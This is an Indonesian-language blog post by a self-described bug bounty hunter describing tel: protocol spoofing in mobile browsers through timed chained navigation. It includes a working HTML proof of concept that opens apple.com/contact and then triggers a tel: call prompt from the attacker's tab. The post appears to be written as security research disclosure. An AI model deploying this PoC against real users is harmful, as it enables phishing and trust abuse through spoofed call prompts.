Timing-Based tel: Protocol Spoofing via Chained Navigation


tel:
protocol spoofing adalah teknik manipulasi berbasis waktu yang digunakan untuk menyalahgunakan kepercayaan pengguna dengan membuat mereka percaya bahwa prompt panggilan telepon berasal dari situs terpercaya, padahal sebenarnya dimanipulasi oleh situs attacker melalui timing-based chained navigation.
⚙️ Teknik: Chained Navigation + Timing
Teknik ini bekerja dengan cara berikut:
User klik tombol dari halaman attacker.
Redirect cepat ke situs terpercaya (misalnya
apple.com/contact
) menggunakanwindow.open
.Beberapa ratus milidetik setelahnya,
document.location = 'tel:+...'
dijalankan di tab awal.Korban melihat situs terpercaya terbuka, lalu prompt panggilan muncul di tab sebelumnya — membuat kesan bahwa situs trusted-lah yang menyebabkan prompt
tel:
muncul.
🧪 Proof of Concept (PoC)
Berikut ini adalah PoC sederhana yang menunjukkan teknik ini dalam praktik:
<!DOCTYPE html>
<html>
<head>
<title>tel: Spoofing Demo</title>
</head>
<body>
<h2>Click to Continue</h2>
<input
type="button"
value="Click here"
onclick="
setTimeout(function() {
window.open('https://www.apple.com/contact/');
}, 123);
setTimeout(function() {
document.location = 'tel:+2123232';
}, 723);
"
>
</body>
</html>
✅ Kesimpulan
Timing-based tel:
spoofing menunjukkan bagaimana manipulasi waktu dan navigasi bisa menyalahgunakan protokol sistem untuk menipu pengguna. Teknik ini relatif sederhana, namun sangat efektif untuk phishing atau trust abuse di browser mobile.
Subscribe to my newsletter
Read articles from zeeagil directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

zeeagil
zeeagil
Hi, I’m a bug bounty hunter and cybersecurity enthusiast who began my journey in 2023. I enjoy exploring and discovering hidden vulnerabilities in browsers, applications, and various platforms—especially those that are rarely examined by others. My focus is on browser and website security issues. I also share my findings and educational content through my YouTube channel, Lazy Cyber Security.